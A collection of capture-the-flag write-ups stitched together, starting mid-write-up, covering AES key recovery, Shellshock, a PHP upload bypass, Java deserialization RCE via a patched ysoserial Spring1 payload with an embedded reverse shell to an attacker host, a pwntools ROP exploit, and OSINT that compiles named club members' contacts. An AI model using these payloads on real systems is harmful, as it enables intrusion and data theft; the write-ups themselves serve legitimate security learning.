now, we know that the encrypted data is hex encoded strings, and we know that the encryption key is composed of two bytes, so we'll use this to forge our attack, we'll take each 16-bytes block of the final hash, try to decrypt it with one of the possible keys, and take the ones that yield a valid hex encoded string, after we got all the encryption keys, we'll re-order the key bytes using the positions in each block by replicating the bytes selection process in the original script. Here's the final script:```python#!/usr/bin/python2
from Crypto.Cipher import AESfrom hashlib import md5
def fibseq(n): out = [0, 1] for i in range(2, n): out += [out[(i - 1)] + out[(i - 2)]] return out
FIBOFFSET = 4919
with open('hash.txt', 'r') as f: hash = f.read().rstrip().decode('hex')
possible_keys = []
for i in range(256): for j in range(256): possible_keys.append((chr(i) + chr(j)) * 16)
blocks = [hash[i: i + 32] for i in range(0, len(hash), 32)]key_blocks = []
for n, block in enumerate(blocks): for thiskey in possible_keys: cipher = AES.new(thiskey, AES.MODE_ECB) tmp = cipher.decrypt(block)
try: tmp.decode('hex') print (tmp, thiskey, n) key_blocks.append(thiskey[:2]) break except: pass
len_data = len(blocks) * 2MAXFIBSIZE = 42 + len_data + FIBOFFSETFIB = fibseq(MAXFIBSIZE)
key = ''key_positions = []for i in range(0, len_data, 2): key_positions.append(((i + FIB[FIBOFFSET + i]) % 42, (i + 1 + FIB[FIBOFFSET + i + 1]) % 42))
for i in range(42): for n, pos in enumerate(key_positions): if i == pos[0]: p = 0 break elif i == pos[1]: p = 1 break key += key_blocks[n][p]
print(key)```the flag is: `midnight{xwJjPw4Vp0Zl19xIdaNuz6zTeMQ1wlNP}`
it was a pretty easy challenge, but fun nonetheless. |

Clicking the link took me to the default apache page, so I decided to go straight into gobuster to find other pages.

First time I ran it the /cgi-bin/ directory stood out to me, so I ran it again on that directory and discovered the scriptlet file located within.

This appears to be a bash script that just runs whoami. Since this is bash, let's try exploiting shellshock. (cgi-bin + ctf - user input = shellshock)
To begin, I intercepted the request firefox was making to the script in burpsuite

And then hitting ctrl + R to send it to the repeater to make things eaiser.
To test for shellshock, we can replace the user agent string with `() { :;}; echo; echo vulnerable` . If the response from the server contains the word `vulnerable`, we have a hit.
And it did.
My home network wouldn't allow me to catch a reverse shell, but burpsuite is all the shell I need at this point. After some poking around, I found something interesting at / (full path for ls was required)

catting the file revealed hex data
So I threw that into cyberchef and decoded from hex. After decoding that cyberchef was nice enough to point out that this was gzipped data and just handed me the flag.
Success! This was a really fun challenge.
|
# Defund's Crypt### Category: web### Description:One year since defund's descent. One crypt. One void to fill. Clam must do it, and so must you.### Author: aplet123
### Solution:When we went to the site we immediately analyzed the HTML code, inside it we got two hints:
- the flag file is in the root directory `/flag.txt`- the source code is at `/src.php` of the website
So let's get the [code](src.php) and analyze it:As the frontend asks we know that we can upload a picture, in particular `.jgp`, `.png` and `.bmp` images.There are tons of checks like the effective existance of a file in the incoming request:```phpif ( !isset($_FILES['imgfile']['error']) || is_array($_FILES['imgfile']['error'])) { throw new RuntimeException('The crypt rejects you.');}switch ($_FILES['imgfile']['error']) {case UPLOAD_ERR_OK: break;case UPLOAD_ERR_NO_FILE: throw new RuntimeException('You must leave behind a memory lest you be forgotten forever.');case UPLOAD_ERR_INI_SIZE:case UPLOAD_ERR_FORM_SIZE: throw new RuntimeException('People can only remember so much.');default: throw new RuntimeException('The crypt rejects you.');} ```one for the file size:```phpif ($_FILES['imgfile']['size'] > 1000000) { throw new RuntimeException('People can only remember so much..');}```and so on.In particular in this check:```php$finfo = new finfo(FILEINFO_MIME_TYPE);if (false === $ext = array_search( $finfo->file($_FILES['imgfile']['tmp_name']), array( '.jpg' => 'image/jpeg', '.png' => 'image/png', '.bmp' => 'image/bmp', ), true)) { throw new RuntimeException("Your memory isn't picturesque enough to be remembered.");}```we are looking for the existance of the mime type of the received file in the array and if it exists we put the extension in `$ext` variable. ```phpif (strpos($_FILES["imgfile"]["name"], $ext) === false) { throw new RuntimeException("The name of your memory doesn't seem to match its content.");}```Here we are checking if the extension based on mime type is present into the filename
After all this checks there is the filename forging:```php$bname = basename($_FILES["imgfile"]["name"]);$fname = sprintf("%s%s", sha1_file($_FILES["imgfile"]["tmp_name"]), substr($bname, strpos($bname, ".")));```This code has a huge flaw: the extension is got from the realname so if we sent a file with a composed extension and the right mime type it won't get blocked.The challenge is also in php so we can upload a php script and reach a local file inclusion for the flag file. Let's try it:
Let's upload a file and send the request to repeater in Burp so we can modify it:modify the filename appending `.php` at the end of the filename and add the php script for the file inclusion ``and send it:BOOM we got the flag!### Flag:```actf{th3_ch4ll3ng3_h4s_f4ll3n_but_th3_crypt_rem4ins}``` |
# Snake++
141 points
### Prompt
> Snake Oil Co. has invented a special programming language to play their new and improved version of Snake. Beat the game to get the flag.settings Service: `nc snakeplusplus-01.play.midnightsunctf.se 55555`
### Solution
When I first connected to the remote server, I was presented with a menu, detailing 3 options: Play in player mode, play in computer mode, or exit. The rules detail that a score of 42 will grant you a flag, so I first tried in player mode (where I direct the snake).
- `A` is a good apple: it grows the snake 1 in length- `B` is a bad apple, it shrinks the snake in length. Best shoot these
The snake is controlled with:
- `L` - will advance the snake one place ***then*** turn the direction 90 degrees left.- `R` - will advance the snake one place ***then*** turn the direction 90 degrees right.- `' '` (space) will "shoot" in the direction the snake is pointed, until it hits either `A` (which it will delete), `B`, which it will delete, or your snake, or the wall. Note: you don't die if you shoot yourself. After shooting, the snake moves forward one square- `''` (enter), which will advance the snake 1 in the direction it points.
When I played in player mode, I noticed no warning that no flag would be given for a win in player mode, so I figured if I could endure the tedious game (the move before turn, paired with me being bad at rights and lefts made this angering at best), I would get flag... easy, right? Two hours later, I finally reached a score of 42, and the game did not give me a flag >:(.
Now to computerize it. The language description for Snake++ is presented in [lang-desc.txt](lang-desc.txt).
Our game plan now becomes the writing of a function in Snake++ that can choose the next move based on board state. We implemented it in parts:
- [driver.py](driver.py) - supplies [snake.ai](snake.ai) to server, and runs in while loop, detecting flag if won.- [snake.ai](snake.ai) - a misnomer, as this is really quite a dumb function (and not ***at all*** optimized, which we were too tired to see at the time). This is the Snake++ program/function that determines the move to make. This function encompasses: - A hamiltonian cycle through the map, stored to RAM. [hampath.txt](hampath.txt) shows this - start in left bottom corner facing right, and the move in your cell is what to submit to stay on hampath. - Logic to determine what to do based on cycle, apple type...
[snake.ai](snake.ai) loads the hamiltonian path/cycle into RAM if it is not there already (we could optimize this by not writing all the `F`'s). Then:
- If we are on a turn in the hampath, we must turn- If there is a `B` near, return shoot (`' '`)- Else, move forward.
> Note: `snake.ai` requires the starting (random) position to be the same direction of the hampath at that spot, so probability decrees that it works 1/4 tries.
I know, we are all CS majors, and while you might expect a better solution from us, we are also masters of minimal effort.
So, this scrip ***barely*** works... We ran it in a loop, one run at a time (as to keep the server as fast as possible), and consistently got scores of 30-39 (there's a 90-sec timeout for computer mode). Then, on a lucky run, we got a score of 42.
```midnight{Forbidden_fruit_is_tasty}```
~ Lyell Read, Phillip Mestas, Athos |
# Who Made Me
950 points
### Prompt
> One of the developers of this CTF worked really hard on this challenge.
> note: the answer is not the author's name
> Author: c
### Solution:
Now for a much more real-world OSINT challenge. First, I started by doing a bit of recon. I ascertained that:
- `AU` in `AUCTF` is for Auburn University ([homeapge](https://www.auburn.edu/))- `AUCTF` is run by members of the `AUEHC` ([Auburn University Ethical Hacking Club](https://ehc.auburn.edu/)). `AUEHC` is comprised of members: - President - Jordan Sosnowski: [email protected] - Vice President - DeMarcus Campbell: [email protected] - Treasure - Luke Gleba: [email protected] - Technical Lead - Charlie Harper: [email protected] - Technical Lead - Drew Batten: [email protected] - [Source](https://ehc.auburn.edu/about/)- `AUCTF` Discord is run by discord users: - c AKA _c#9643 - FireKing AKA Iamfireking#2686 - JohnsonJangler AKA JohnsonJangler#0353 - Kensocolo AKA Kensocolo#1000 - nadrojisk AKA nadrojisk#6700 - OG_Commando AKA The OG Commando#6632 - vincent AKA FlaminArrowz#5042 - 死神 (shinigami) AKA demarcus1621#6819- `AUEHC` also has a [Github Organization](https://github.com/auehc), which the following github users are a part of: - Demarcus Campbell AKA demarcus1621 - Jordan Sosnowski AKA nadrojisk - Vincent Chu AKA vincentchu37- Within that organization are repos for: - [AUCTF-2020](https://github.com/auehc/AUCTF-2020) Which contains entirely commits by `nadrojisk`, with a pending pull request formulated by `demarcus1621`, with nothing interesting in it. - [Their site](https://github.com/auehc/auehc.github.io) - Past competitions, mostly irrelevant to this challenge.- Reddit account has posted three things, none of which are of use here: https://www.reddit.com/user/auehc/ - CTFTime Team `AUEHC` only has one player, `nadrojisk`. https://ctftime.org/team/82180
With that in mind, I went about composing this table:
| Name | Discord | Github | Gitlab | Twitter | Notes ||-------------------|----------------------------------------|---------------------------------|----------------------------------------|-------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------|| Jordan Sosnowski | nadrojisk AKA nadrojisk#6700 | https://github.com/nadrojisk | NA | https://twitter.com/nadrojisk | All commits to the challenge repo. Prime suspect. Nothing interesting on twitter || Vincent Chu | vincent AKA FlaminArrowz#5042 | https://github.com/vincentchu37 | https://github.com/vincentchu37/gitlab | Private | Has commits to the site @ https://github.com/auehc/auehc.github.io, https://www.linkedin.com/in/vincentchu37/ || Demarcus Campbell | 死神 (shinigami) AKA demarcus1621#6819 | https://github.com/demarcus1621 | NA | Does not Exist | Has pull request to auehc/AUCTF-2020 @ https://github.com/auehc/AUCTF-2020/pull/1 but changes only to README.md, and from private repo :( || Abhinav V. | Kensocolo AKA Kensocolo#1000 | NA | NA | https://twitter.com/kensocolo | Twitter, not much found || Charlie Harper | c AKA _c#9643 | https://github.com/chharles | NA | NA | Pretty sure this is Charlie Harper |
The flag was in a repo that was *conveniently* not pinned in Vincent Chu's github. This was in one of the past commits in their repo `AUCTF-2020` [link](https://github.com/vincentchu37/AUCTF-2020/commit/56721948f12e3a76a5316c62ad2bcf47e8119926) [archive](http://archive.today/2020.04.06-032243/https://github.com/vincentchu37/AUCTF-2020/commit/56721948f12e3a76a5316c62ad2bcf47e8119926) made by github user `chharles`, who I have retroactively added to the table above.
```auctf{G1tHuB_4lwAY5_r3mEmB3r5_8923_1750921}```
~Lyell Read |
# Tragic Number
* After downloading the zip file, I have tried to extract it. But it gave error! Then I have checked its format by `file` command. It wasn't zip.
* I am using online hex editor [https://hexed.it/] to view/edit the file.
* Here is the list of different file formats and their signatures. [https://en.wikipedia.org/wiki/List_of_file_signatures] 
* From that wikipedia page, the zip file's signature is `50 4B 03 04` But here the the file starts with `48 34 43 4B`, So replace that with actual signature. 
* And export the file, and extract it.
> ### LLS{tragic_number_more_like_magic_number} |
# TAMUctf 2020 – TOO_MANY_CREDITS_1
* **Category:** web* **Points:** 50
## Challenge
> Okay, fine, there's a lot of credit systems. We had to put that guy on break; seriously concerned about that dude.> > Anywho. We've made an actually secure one now, with Java, not dirty JS this time. Give it a whack?> > If you get two thousand million credits again, well, we'll just have to shut this program down.> > http://toomanycredits.tamuctf.com
## Solution
The website allows you to increment your credits, but you have to get two thousand million credits (or more) in order to get the flag. Obviously, the credit generation can't be bruteforced/automated, because automation countermeasures are in place.
Credits are incremented via HTTP GET.
```GET / HTTP/1.1Host: toomanycredits.tamuctf.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateConnection: closeReferer: http://toomanycredits.tamuctf.com/Cookie: counter="H4sIAAAAAAAAAFvzloG1uIhBNzk/Vy+5KDUls6QYg87NT0nN0XMG85zzS/NKjDhvC4lwqrgzMTB6MbCWJeaUplYUMEAAIwCwY0JiUgAAAA=="Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OKServer: nginx/1.16.1Date: Fri, 20 Mar 2020 12:11:23 GMTContent-Type: text/html;charset=UTF-8Content-Length: 454Connection: closeSet-Cookie: counter="H4sIAAAAAAAAAFvzloG1uIhBNzk/Vy+5KDUls6QYg87NT0nN0XMG85zzS/NKjDhvC4lwqrgzMTB6MbCWJeaUplYUMEAAEwAKMkv7UgAAAA=="; Version=1; HttpOnlyContent-Language: it-IT
<html lang="en"><head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
<title>Java Credits</title></head>
<body>
<main role="main">
<form> <h2> <span>You have 2 credits.</span> <span> You haven't won yet...</span> </h2> <button type="submit">Get More</button> </form>
</main></body></html>```
There is a strange cookie, called `counter`, and it seems to be strangely encoded. Analyzing several requests, you can discover that only the last part changes.
```H4sIAAAAAAAAAFvzloG1uIhBNzk/Vy+5KDUls6QYg87NT0nN0XMG85zzS/NKjDhvC4lwqrgzMTB6MbCWJeaUplYUMEAAIwCwY0JiUgAAAA==H4sIAAAAAAAAAFvzloG1uIhBNzk/Vy+5KDUls6QYg87NT0nN0XMG85zzS/NKjDhvC4lwqrgzMTB6MbCWJeaUplYUMEAAEwAKMkv7UgAAAA==H4sIAAAAAAAAAFvzloG1uIhBNzk/Vy+5KDUls6QYg87NT0nN0XMG85zzS/NKjDhvC4lwqrgzMTB6MbCWJeaUplYUMEAAKwCppy9lUgAAAA==H4sIAAAAAAAAAFvzloG1uIhBNzk/Vy+5KDUls6QYg87NT0nN0XMG85zzS/NKjDhvC4lwqrgzMTB6MbCWJeaUplYUMEAAGwAT9ib8UgAAAA==H4sIAAAAAAAAAFvzloG1uIhBNzk/Vy+5KDUls6QYg87NT0nN0XMG85zzS/NKjDhvC4lwqrgzMTB6MbCWJeaUplYUMEAAOwCFxiGLUgAAAA==............................................................................................^^^^^^^^........```
The text says that they are using Java and the Spring logo is present in the favicon.
Furthermore, removing the last part of the cookie will spawn an interesting error.
```GET / HTTP/1.1Host: toomanycredits.tamuctf.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateConnection: closeReferer: http://toomanycredits.tamuctf.com/Cookie: counter="H4sIAAAAAAAAAFvzloG1uIhBNzk/Vy+5KDUls6QYg87NT0nN0XMG85zzS/"Upgrade-Insecure-Requests: 1
HTTP/1.1 500 Internal Server ErrorServer: nginx/1.16.1Date: Fri, 20 Mar 2020 14:20:46 GMTContent-Type: text/html;charset=UTF-8Content-Length: 333Connection: closeContent-Language: it-IT
<html><body><h1>Whitelabel Error Page</h1>This application has no explicit mapping for /error, so you are seeing this as a fallback.<div id='created'>Fri Mar 20 14:20:46 GMT 2020</div><div>There was an unexpected error (type=Internal Server Error, status=500).</div><div>Unexpected end of ZLIB input stream</div></body></html>```
This application has no explicit mapping for /error, so you are seeing this as a fallback.
This seems to be a Java serialized object (compressed with GZip and encoded in Base64). So you can write a [Python script](https://raw.githubusercontent.com/m3ssap0/CTF-Writeups/master/TAMUctf%202020/TOO_MANY_CREDITS_1/too-many-credits-1-solver.py) to discover how the original object is formed.
```H4sIAAAAAAAAAFvzloG1uIhBNzk/Vy+5KDUls6QYg87NT0nN0XMG85zzS/NKjDhvC4lwqrgzMTB6MbCWJeaUplYUMEAAIwCwY0JiUgAAAA==b'\xac\xed\x00\x05sr\x00-com.credits.credits.credits.model.CreditCount2\t\xdb\x12\x14\t$G\x02\x00\x01J\x00\x05valuexp\x00\x00\x00\x00\x00\x00\x00\x01'
H4sIAAAAAAAAAFvzloG1uIhBNzk/Vy+5KDUls6QYg87NT0nN0XMG85zzS/NKjDhvC4lwqrgzMTB6MbCWJeaUplYUMEAAEwAKMkv7UgAAAA==b'\xac\xed\x00\x05sr\x00-com.credits.credits.credits.model.CreditCount2\t\xdb\x12\x14\t$G\x02\x00\x01J\x00\x05valuexp\x00\x00\x00\x00\x00\x00\x00\x02'
H4sIAAAAAAAAAFvzloG1uIhBNzk/Vy+5KDUls6QYg87NT0nN0XMG85zzS/NKjDhvC4lwqrgzMTB6MbCWJeaUplYUMEAAKwCppy9lUgAAAA==b'\xac\xed\x00\x05sr\x00-com.credits.credits.credits.model.CreditCount2\t\xdb\x12\x14\t$G\x02\x00\x01J\x00\x05valuexp\x00\x00\x00\x00\x00\x00\x00\x05'
H4sIAAAAAAAAAFvzloG1uIhBNzk/Vy+5KDUls6QYg87NT0nN0XMG85zzS/NKjDhvC4lwqrgzMTB6MbCWJeaUplYUMEAAGwAT9ib8UgAAAA==b'\xac\xed\x00\x05sr\x00-com.credits.credits.credits.model.CreditCount2\t\xdb\x12\x14\t$G\x02\x00\x01J\x00\x05valuexp\x00\x00\x00\x00\x00\x00\x00\x06'
H4sIAAAAAAAAAFvzloG1uIhBNzk/Vy+5KDUls6QYg87NT0nN0XMG85zzS/NKjDhvC4lwqrgzMTB6MbCWJeaUplYUMEAAOwCFxiGLUgAAAA==b'\xac\xed\x00\x05sr\x00-com.credits.credits.credits.model.CreditCount2\t\xdb\x12\x14\t$G\x02\x00\x01J\x00\x05valuexp\x00\x00\x00\x00\x00\x00\x00\x07'```
The `value` attribute is at the end as we supposed, so a malicuous payload can easily crafted, e.g.:
```b'\xac\xed\x00\x05sr\x00-com.credits.credits.credits.model.CreditCount2\t\xdb\x12\x14\t$G\x02\x00\x01J\x00\x05valuexp\x00\x00\x00\x00\xff\xff\xff\xff'```
Using the [Python script](https://raw.githubusercontent.com/m3ssap0/CTF-Writeups/master/TAMUctf%202020/TOO_MANY_CREDITS_1/too-many-credits-1-solver.py) you can craft the cookie.
```[*] Malicious string is: b'\xac\xed\x00\x05sr\x00-com.credits.credits.credits.model.CreditCount2\t\xdb\x12\x14\t$G\x02\x00\x01J\x00\x05valuexp\x00\x00\x00\x00\xff\xff\xff\xff'[*] Compressed malicious bytes are: b'\x1f\x8b\x08\x00\x0c\xe6t^\x02\xff[\xf3\x96\x81\xb5\xb8\x88A79?W/\xb9(5%\xb3\xa4\x18\x83\xce\xcdOI\xcd\xd1s\x06\xf3\x9c\xf3K\xf3J\x8c8o\x0b\x89p\xaa\xb8310z1\xb0\x96%\xe6\x94\xa6V\x140\x00\xc1\x7f \x00\x00\xc5s\xfe\xcbR\x00\x00\x00'[*] Base64 compressed malicious string is: H4sIAAzmdF4C/1vzloG1uIhBNzk/Vy+5KDUls6QYg87NT0nN0XMG85zzS/NKjDhvC4lwqrgzMTB6MbCWJeaUplYUMADBfyAAAMVz/stSAAAA```
A [Python script](https://raw.githubusercontent.com/m3ssap0/CTF-Writeups/master/TAMUctf%202020/TOO_MANY_CREDITS_1/too-many-credits-1-solver.py) can be developed to perform all the reported operations.
```pythonimport gzipimport base64
base64_compressed_strings = ["H4sIAAAAAAAAAFvzloG1uIhBNzk/Vy+5KDUls6QYg87NT0nN0XMG85zzS/NKjDhvC4lwqrgzMTB6MbCWJeaUplYUMEAAIwCwY0JiUgAAAA==","H4sIAAAAAAAAAFvzloG1uIhBNzk/Vy+5KDUls6QYg87NT0nN0XMG85zzS/NKjDhvC4lwqrgzMTB6MbCWJeaUplYUMEAAEwAKMkv7UgAAAA==","H4sIAAAAAAAAAFvzloG1uIhBNzk/Vy+5KDUls6QYg87NT0nN0XMG85zzS/NKjDhvC4lwqrgzMTB6MbCWJeaUplYUMEAAKwCppy9lUgAAAA==","H4sIAAAAAAAAAFvzloG1uIhBNzk/Vy+5KDUls6QYg87NT0nN0XMG85zzS/NKjDhvC4lwqrgzMTB6MbCWJeaUplYUMEAAGwAT9ib8UgAAAA==","H4sIAAAAAAAAAFvzloG1uIhBNzk/Vy+5KDUls6QYg87NT0nN0XMG85zzS/NKjDhvC4lwqrgzMTB6MbCWJeaUplYUMEAAOwCFxiGLUgAAAA=="]
for base64_compressed_string in base64_compressed_strings: print("[*] Base64 compressed string is: {}".format(base64_compressed_string))
compressed_bytes = base64.b64decode(base64_compressed_string) print("[*] Compressed bytes are: {}".format(compressed_bytes))
original_string = gzip.decompress(compressed_bytes) print("[*] Original bytes are: {}".format(original_string)) print()
print(" -------\n")
malicious_string = b'\xac\xed\x00\x05sr\x00-com.credits.credits.credits.model.CreditCount2\t\xdb\x12\x14\t$G\x02\x00\x01J\x00\x05valuexp\x00\x00\x00\x00\xff\xff\xff\xff'print("[*] Malicious string is: {}".format(malicious_string))
compressed_malicious_bytes = gzip.compress(malicious_string)print("[*] Compressed malicious bytes are: {}".format(compressed_malicious_bytes))
base64_compressed_malicious_string = base64.b64encode(compressed_malicious_bytes).decode("ascii")
print("[*] Base64 compressed malicious string is: {}".format(base64_compressed_malicious_string))```
And then performing the request you will get the flag.
```GET / HTTP/1.1Host: toomanycredits.tamuctf.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateConnection: closeReferer: http://toomanycredits.tamuctf.com/Cookie: counter="H4sIAAzmdF4C/1vzloG1uIhBNzk/Vy+5KDUls6QYg87NT0nN0XMG85zzS/NKjDhvC4lwqrgzMTB6MbCWJeaUplYUMADBfyAAAMVz/stSAAAA"Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OKServer: nginx/1.16.1Date: Fri, 20 Mar 2020 15:49:46 GMTContent-Type: text/html;charset=UTF-8Content-Length: 470Connection: closeSet-Cookie: counter="H4sIAAAAAAAAAFvzloG1uIhBNzk/Vy+5KDUls6QYg87NT0nN0XMG85zzS/NKjDhvC4lwqrgzMTB6MbCWJeaUplYUMDAwMAIxAwCWeiUoUgAAAA=="; Version=1; HttpOnlyContent-Language: it-IT
<html lang="en"><head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
<title>Java Credits</title></head>
<body>
<main role="main">
<form> <h2> <span>You have 4294967296 credits.</span> <span> gigem{l0rdy_th15_1s_mAny_cr3d1ts}</span> </h2> <button type="submit">Get More</button> </form>
</main></body></html>```
The flag is the following.
```gigem{l0rdy_th15_1s_mAny_cr3d1ts}``` |
When we open the website, it tells:`Find this special file.`so use dirsearch(a file and dir scanner) to search for "special file" and finally we got: robots.txt and robots.php.
visit it and it says:`What is the adage of Byrgenwerth scholars?MAKE a GET request to this page with a header named 'answer' to submit your answer`By searching google, i found the answer is `Fear the Old Blood` Then modify your headers with `answer: Fear the Old Blood` and visit robots.php, flag came out:auctf{f3ar_z_olD3_8l0oD} |
Challenge has a function room4 which can be called up from the main menu with item 4. Here is the code snippet of the main function from Ghidra:
```C if (cVar1 == '3') { if (isInRoom1 == '\0') { if (isInRoom2 == '\0') { if (isInRoom3 == '\0') { if (isInRoom4 == '\0') { puts("You aren\'t in a room!!"); } else { room4(); } } else { puts("Have you tried ALL the options?"); } } else { puts("Hola como estas esta habitación es español"); } } else { puts("Hello, this is just a plain old room. Poke around the others"); }```
As we can see from the main menu, only one room4 function is called. Let's take a look at her code:
```C puts("Wow this room is special. It echoes back what you say!"); while( true ) { if (unlockHiddenRoom4 != '\0') { puts("Welcome to the hidden room! Good Luck"); printf("Enter something: "); gets(pos_bof); return; } printf("Press Q to exit: "); fgets(input,0x10,stdin); remove_newline(input); printf("\tYou entered \'%s\'\n",input); iVar1 = strcmp(input,"Q"); if (iVar1 == 0) break; iVar1 = strcmp(input,"Stephen"); if (iVar1 == 0) { unlockHiddenRoom4 = '\x01'; } } return;```
Posible buffer overflow here. Lets check security first
```bashauctf$ checksec challenge[*] '/auctf/challenge' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: PIE enabled```
The stack is not executable, so we use the ROP chain for exploitation Here is the finished code of exploit
```pythonfrom pwn import *
#current=process("./challenge")current=remote("157.245.252.113",30012)e=ELF("./challenge")#gdb.attach(current,'''#set disassembly-flavor intel#b get_flag#b *0x565568e4#''')base=0x56555000#because ASLR disable static base of binarycurrent.sendlineafter("Your choice: ",str(2))current.sendlineafter("Choose a room to enter: ",str(4))current.sendlineafter("Your choice: ",str(3))current.sendlineafter("Press Q to exit: ","Stephen")ebp=0xffffd6a8#old ebp because we overwrite ebp on the stackrop=b''rop+=p32(base+0x0000101e)#pop ebx ; retrop+=p32(base+0x4000)#base for libc call#used to calculate the address of imported characters, on this case getsrop+=p32(base+0x1050)#gets#JMP dword ptr [0x14 + EBX]=>gets rop+=p32(base+0x19d0)#pop edi ; pop ebp ; ret#Because gets for some reason takes as an argument a variable in the stack through one and interprets the next as a return address, which does not allow to use gets twice in a row#Therefore it is hererop+=p32(base+e.symbols[b'key1'])#key1 addr#gets(key1)->pop edi; pop ebp; ret->gets(key3)->get_flag()rop+=p32(ebp)#ebprop+=p32(base+0x1050)#getsrop+=p32(base+e.symbols[b'get_flag'])rop+=p32(base+e.symbols[b'key3'])#key1 addrcurrent.sendlineafter("Enter something: ",b"A"*24+p32(ebp)+rop)#send payloadcurrent.send(b"\x01\x01"+p32(0x616e6765)+p32(0x537472)+b'\n')#send data to key1,key2 and key4current.send(p32(0x56557415)+b'\n')#send data to key3current.interactive()```
|
# TAMUctf 2020 – TOO_MANY_CREDITS_2
* **Category:** web* **Points:** 432
## Challenge
> Even if you could get the first flag, I bet you can't pop a shell!> > http://toomanycredits.tamuctf.com
## Solution
This challenge is the continuation of the previous one.
Considering that:* the backend is using Java;* there is the Spring logo in the favicon.
This is a Java Deserialization vulnerability which can lead to a Remote Code Execution.
[ysoserial](https://github.com/frohoff/ysoserial) `Spring1` payload can be used to have a RCE, but I was not able to find how to exfiltrate the output of commands via pure shell.
So I downloaded ysoserial source code and I patched it in order to have a Java based shell inspired from [this one](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#java-alternative-1).
```javajava.lang.String host="x.x.x.x";int port=1337;java.lang.String[] cmd={"commands", "here"};java.lang.Process p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();java.net.Socket s=new java.net.Socket(host,port);java.io.InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();java.io.OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50L);try {p.exitValue();break;}catch (java.lang.Exception e){}};p.destroy();s.close();```
You can change the code into [`ysoserial.payloads.util.Gadgets`](https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/util/Gadgets.java#L117) class from this...
```java String cmd = "java.lang.Runtime.getRuntime().exec(\"" + command.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\"") + "\");";```
to this...
```java String command_tmp = ""; for (String s: command.split(" ")) { command_tmp += ("\"" + s + "\","); } command_tmp = command_tmp.substring(0, command_tmp.length() - 1); String cmd = "java.lang.String host=\"x.x.x.x\";int port=1337;java.lang.String[] cmd={" + command_tmp.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\"") + "};java.lang.Process p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();java.net.Socket s=new java.net.Socket(host,port);java.io.InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();java.io.OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50L);try {p.exitValue();break;}catch (java.lang.Exception e){}};p.destroy();s.close();";```
You can see the complete Java file [here](https://raw.githubusercontent.com/m3ssap0/CTF-Writeups/master/TAMUctf%202020/TOO_MANY_CREDITS_2/Gadgets.java).
At this point you can setup a listening host with `nc -lvkp 1337` and you can improve the [Python script](https://raw.githubusercontent.com/m3ssap0/CTF-Writeups/master/TAMUctf%202020/TOO_MANY_CREDITS_2/too-many-credits-2-solver.py) for the previous challenge in order to use the patched ysoserial and to read the produced payload.
```pythonimport gzipimport base64import requestsimport osimport sysimport time
payload_file = "payload-spring1.bin"url = "http://toomanycredits.tamuctf.com/"headers = { "User-Agent": "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US);", "Referer": "http://toomanycredits.tamuctf.com/"}
command = sys.argv[1]
payload = "{}".format(command)print("[*] Creating payload: {}".format(payload))os.remove(payload_file)os.popen("java -jar ./ysoserial/target/ysoserial-0.0.6-SNAPSHOT-all.jar Spring1 \"{}\" > {}".format(payload, payload_file))time.sleep(5)
with open(payload_file, "rb") as f: malicious_payload = f.read()
print("[*] Malicious payload is: {}".format(malicious_payload))
compressed_malicious_bytes = gzip.compress(malicious_payload)print("[*] Compressed malicious bytes are: {}".format(compressed_malicious_bytes))
base64_compressed_malicious_payload = base64.b64encode(compressed_malicious_bytes).decode("ascii")print("[*] Base64 compressed malicious string is: {}".format(base64_compressed_malicious_payload))
print("[*] Sending request.")cookies = dict(counter="\"{}\"".format(base64_compressed_malicious_payload))page = requests.get(url, headers=headers, cookies=cookies)
print("[*] Response received:\n\n{}".format(page.text))```
Launching commands will allow you to discover the flag.
```root@m3ssap0:~/Desktop# python3 too-many-credits-2-solver.py "ls"root@m3ssap0:~/Desktop# python3 too-many-credits-2-solver.py "cat flag.txt"
root@m3ssap0:~# nc -lvkp 1337Listening on [0.0.0.0] (family 0, port 1337)Connection from ec2-34-208-211-186.us-west-2.compute.amazonaws.com 57272 received!binflag.txtlibConnection from ec2-34-208-211-186.us-west-2.compute.amazonaws.com 57388 received!gigem{da$h_3_1s_A_l1f3seNd}```
The flag is the following.
```gigem{da$h_3_1s_A_l1f3seNd}``` |
Subsets and Splits
No community queries yet
